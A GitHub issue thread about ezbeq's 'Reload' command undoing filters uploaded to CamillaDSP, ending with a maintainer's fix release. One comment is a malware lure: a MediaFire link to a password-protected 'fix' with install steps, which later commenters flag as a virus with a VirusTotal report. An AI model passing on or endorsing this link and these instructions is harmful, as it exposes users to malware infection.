### ISSUE TITLE
Sent to camilladsp,filters not working.

### ISSUE THREAD

**Issue by zorgzola** [3ll3d00d/ezbeq#75]
When ezbeq uploads filters,it's sends a "Reload" command just after the SetConfig command. The "Reload" command makes it apply the original config again.
attach files are camilladsp logs, videos when uploading filters(use REW Generator to send the frequency of BEQ maximum boost. The "volume" input and output levels in CamillaDSP WEBUI are the same. manually adding Filters works).
Could you verify and fix it, thanks..

[camilladsp.log](https://github.com/user-attachments/files/16743453/camilladsp.log)

![camiladsp ezbeq](https://github.com/user-attachments/assets/2c169669-bce8-4b21-8418-5de0dbb7725d)

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by zorgzola** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

thanks ,i downloaded.

**Comment by HEnquist** [comment]
Don't download weird binaries! What is that thing??

**Comment by zorgzola** [comment]
> Don't download weird binaries! What is that thing??

OK, got it. Didn't find anything useful.

**Comment by ZhianLin** [comment]
> > to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."
> 
> ok,but this fix https://app.mediafire.com/3ag3jpquii3of the file size is 0kb,am I doing wrong?

this is virus
virustotal report virus！from https://app.mediafire.com/3ag3jpquii3of
https://www.virustotal.com/gui/file/40c823f1d6c00f1ea2482833d7c45773b6830cc812f5352aff102df63330aea7/detection
![image](https://github.com/user-attachments/assets/43336e47-588f-4932-a610-7712f4021b8f)

**Comment by 3ll3d00d** [comment]
should be fixed in https://github.com/3ll3d00d/ezbeq/releases/tag/2.1.0a13
